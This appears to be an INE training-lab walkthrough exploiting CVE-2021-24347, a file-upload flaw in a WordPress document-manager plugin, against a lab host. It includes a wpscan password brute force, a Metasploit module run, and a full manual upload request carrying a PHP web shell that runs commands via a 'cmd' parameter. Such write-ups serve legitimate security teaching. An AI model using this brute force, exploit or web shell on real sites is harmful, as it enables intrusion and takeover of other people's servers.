Resources
    WordPress Plugin SP Proje ...
    17 October 22

    WordPress Plugin SP Project and Document Manager RCE (CVE-2021-24347)

    Posted byINE
    facebooktwitterlinkedin
    news-featured

    In our lab walkthrough series, we go through selected lab exercises on our INE Platform. Subscribe or sign up for a 7-day, risk-free trial with INE and access this lab and a robust library covering the latest in Cyber Security, Networking, Cloud, and Data Science!

    This exercise is to understand how to exploit the WordPress Plugin SP Project and Document Manager v4.21 to gain a shell of the target machine (CVE-2021-24347).

    Purpose: We will learn how to exploit WordPress Plugin SP Project and Document Manager using the Metasploit Framework module. We will also learn how to exploit it manually to better understand the vulnerability.

    Goal after completing this scenario: Access the /flag.txt file and read the flag!

    Technical difficulty: Beginner

    Introduction

    The SP Project & Document Manager WordPress plugin before v4.22 allows users to upload files, however, the plugin attempts to prevent php and other similar files that could be executed on the server from being uploaded by checking the file extension. But in 2021, a critical vulnerability was found in this plugin. It was discovered that php files could still be uploaded by changing the file extension's case, for example, from "php" to "pHP".

    This vulnerability has been assigned the CVE id CVE-2021-24347. The CVSS score for this vulnerability is 8.8 High.

    What is SP Project & Document Manager?

    It is a Document, File & Media Manager plugin for WordPress. It allows one to upload, manage, track and share documents, files, or media.

    Source: https://wordpress.org/plugins/sp-client-document-manager

    Lab Environment

    In this lab environment, the user is going to get access to a Kali GUI instance. A vulnerable version of SP Project & Document Manager WordPress plugin is running on the target machine. It can be accessed using the tools installed on Kali at http://demo.ine.local.

    Objective: Exploit the remote code execution (RCE) vulnerability in SP Project & Document Manager WordPress plugin v4.21 to gain shell access on the target server and retrieve the flag!

    The following username might be helpful:

    • Username: admin

    The following Dictionary might be helpful:

    • /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt

    sp_project_0_1.png

    Tools

    The best tools for this lab are:

    • Nmap

    • Dirb

    • Curl

    • WPScan

    • A web browser

    • Metasploit Framework

    Solution

    Step 1: Open the lab link to access the Kali GUI instance.

    sp_project_1.png

    Step 2: Check if the provided machine/domain is reachable.

    Command: ping -c3 demo.ine.local

    sp_project_2.png

    The provided machine is reachable. 192.96.197.3 is the IP address of the target machine.

    Step 3: Check open ports on the provided machine.

    Command: nmap -sS -sV demo.ine.local

    sp_project_3.png

    Apache httpd 2.4.29 is running on port 80 on the target machine.

    Step 4: Next we will use dirb tool to find files and directories on the web server.

    Command: dirb http://demo.ine.local

    sp_project_4.png

    Step 5: We can notice that WordPress is running on the target machine. We will run the dirb tool again to find installed plugins on the target machine.

    Command: 

    dirb http://demo.ine.local/wp-content/plugins /usr/share/nmap/nselib/data/wp-plugins.lst

    sp_project_5.png

    Step 6: We can notice that sp-client-document-manager plugin is installed on the target machine. All the wordpress plugin have either **readme.txt" or "README.txt" file in their directory, from which we can find the plugin version. We can use the curl command here to view the content of "readme.txt" file.

    Command: 

    curl http://demo.ine.local/wp-content/plugins/sp-client-document-manager/readme.txt

    sp_project_6.png

    The Stable tag shows 4.21, which is a vulnerable version.

    Step 7: Next we will use wpscan to brute force the password needed to log in to the wordpress application.

    You can find the dictionary required to brute force the password at the following location:

    • Passwords - /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt

    As we know that the target user is admin, we will directly run dictionary attack on the admin user to find the valid password.

    Run the following commands:

    Commands:

    cd /usr/share/metasploit-framework/data/wordlists

    wpscan --url http://demo.ine.local --passwords unix_passwords.txt --usernames admin 

    Note: If it prompts to update the database, type N, for now.

    sp_project_7.png

    sp_project_7_1.png

    We get a valid combination:

    • Username: admin

    • Password: password1

    You can verify if the credentials are valid by logging in to the application at http://demo.ine.local/wp-admin.

    Exploit using Metasploit module

    Step 8: First check the attacker machine's IP address.

    Command: ifconfig 

    sp_project_8.png

    192.96.197.2 is the attacker machine's IP address.

    Step 9: Start the msfconsole and do a search for the module for CVE-2021-24347.

    Commands:

    msfconsole -q

    search CVE-2021-24347

    sp_project_9.png

    Step 10: We will use the above listed module. We will use the application credentials that we found before. Run the following commands one by one:

    Commands:

    use exploit/multi/http/wp_plugin_sp_project_document_rce

    set username admin

    set password password1

    set RHOSTS 192.96.197.3

    set LHOST 192.96.197.2

    check

    exploit

    Note: RHOSTS is the target machine's IP address and LHOST is the attacker machine's IP address. And these values may vary for you.

    sp_project_10.png

    We have successfully gained the meterpreter session.

    Step 11: Let's retrieve the flag. Run the following command over the meterpreter to access bash.

    Command: shell

    sp_project_11.png

    Step 12: Read the flag.

    Commands: 

    ls /

    cat /flag.txt

    sp_project_12.png

    FLAG: 4c5b7206468fd8cfdb779af6a037b6d7

    Exploit Manually

    Step 13: Navigate to the following URL and log in to the WordPress application using the credentials that we found before.

    URL: http://demo.ine.local/wp-admin

    • Username: admin

    • Password: password1

    sp_project_13.png

    Step 14: Configure the intercept on the browser as shown below.

    sp_project_14.png

    Step 15: Start Burp Suite and just refresh the current page to capture the request. Next, send the captured request to the repeater. And then you can turn off the intercept.

    sp_project_15.png

    Step 16: We will use the below endpoint to push a PHP backdoor in the uploads/sp-client-document-manager/1 directory. Note that as we have only one user i.e admin, the id for admin is 1.

    Endpoint:

    URL: http://demo.ine.local/wp-admin/admin.php?page=sp-client-document-manager-fileview&id=1

    Replace the request in the repeater with the following. Remember to change the cookie in your case.

    Request

    POST /wp-admin/admin.php?page=sp-client-document-manager-fileview&id=1 HTTP/1.1

    Host: demo.ine.local

    User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0

    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8

    Accept-Language: en-US,en;q=0.5

    Accept-Encoding: gzip, deflate

    Referer: http://demo.ine.local/wp-admin/admin.php?page=sp-client-document-manager-fileview&id=1

    Content-Type: multipart/form-data; boundary=---------------------------1624163623105522541544277064

    Content-Length: 1220

    Origin: http://demo.ine.local

    Connection: close

    Cookie: wordpress_a0c7d97dc4abfe43e44a8edf6273faf0=admin%7C1662611480%7CT6rfeLpZPfKF5ALMS94cmkjLLqwxXmyVcUKD5mafpWZ%7Cffd539fd7fcb51cf5096c9e18cafdae38f68827e55b4a27cf814d8286dfe62d0; wordpress_test_cookie=WP+Cookie+check; wordpress_logged_in_a0c7d97dc4abfe43e44a8edf6273faf0=admin%7C1662611480%7CT6rfeLpZPfKF5ALMS94cmkjLLqwxXmyVcUKD5mafpWZ%7Cb4113bb9de22771a566c679b71e4b14aca40a6ac6724d5bb4dd28f77964fb0a6; wp-settings-1=uploader%3D1; wp-settings-time-1=1662438680

    Upgrade-Insecure-Requests: 1

    -----------------------------1624163623105522541544277064

    Content-Disposition: form-data; name="cdm_upload_file_field"

    818034d247

    -----------------------------1624163623105522541544277064

    Content-Disposition: form-data; name="_wp_http_referer"

    /wp-admin/admin.php?page=sp-client-document-manager-fileview&id=1

    -----------------------------1624163623105522541544277064

    Content-Disposition: form-data; name="dlg-upload-name"

    -----------------------------1624163623105522541544277064

    Content-Disposition: form-data; name="dlg-upload-file[]"; filename=""

    Content-Type: application/octet-stream

    -----------------------------1624163623105522541544277064

    Content-Disposition: form-data; name="dlg-upload-file[]"; filename="backdoor.pHP"

    Content-Type: application/x-php

    <?php if(isset($_REQUEST['cmd'])){ echo "<pre>"; $cmd = ($_REQUEST['cmd']); system($cmd); echo "</pre>"; die; }?>

    -----------------------------1624163623105522541544277064

    Content-Disposition: form-data; name="dlg-upload-notes"

    -----------------------------1624163623105522541544277064

    Content-Disposition: form-data; name="sp-cdm-community-upload"

    Upload

    -----------------------------1624163623105522541544277064--

    Note that in this request, the filename we are providing is backdoor.pHP which would slip through the check and get uploaded.

    sp_project_16.png

    Hit Send.

    sp_project_16_1.png

    A new file has been created in uploads/sp-client-document-manager/1 folder.

    Step 17: Access the backdoor and run the command ls /.

    URL:

    http://demo.ine.local/wp-content/uploads/sp-client-document-manager/1/backdoor.php?cmd=ls /

    sp_project_17.png

    The flag is there. Retrieve the flag with cat /flag.txt command.

    sp_project_17_1.png

    FLAG: 4c5b7206468fd8cfdb779af6a037b6d7

    Conclusion

    In this article, we learned how to exploit the remote code execution vulnerability that exists in SP Project & Document Manager WordPress plugin v4.21 using Metasploit module as well as manually.

    References

    Try this exploit for yourself! Subscribe or sign up for a 7-day, risk-free trial with INE to access this lab and a robust library covering the latest in Cyber Security, Networking, Cloud, and Data Science!

    © 2024 INE. All Rights Reserved. All logos, trademarks and registered trademarks are the property of their respective owners.
    instagram Logofacebook Logotwitter Logolinkedin Logoyoutube Logo